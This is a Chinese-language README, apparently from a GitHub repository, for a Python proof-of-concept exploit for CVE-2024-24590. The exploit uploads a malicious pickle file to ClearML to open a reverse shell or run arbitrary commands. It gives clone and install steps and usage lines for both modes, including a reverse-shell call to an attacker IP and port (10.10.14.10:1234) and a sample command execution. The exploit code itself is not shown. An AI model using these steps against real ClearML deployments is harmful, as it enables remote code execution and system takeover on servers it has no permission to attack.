本仓库包含一个针对 CVE-2024-24590 的 Python 漏洞利用脚本。该脚本旨在向 ClearML 上传一个恶意 pickle 文件,从而执行反向 Shell 或自定义命令。
克隆仓库:
git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
cd CVE-2024-24590-ClearML-RCE-CMD-POC
安装 ClearML SDK:
pip install clearml
clearml-init
脚本支持两种操作模式:default 和 cmd。
在此模式下,您需要提供攻击者的 IP 和端口以建立反向 Shell。
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
在此模式下,您可以提供要执行的自定义命令。
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"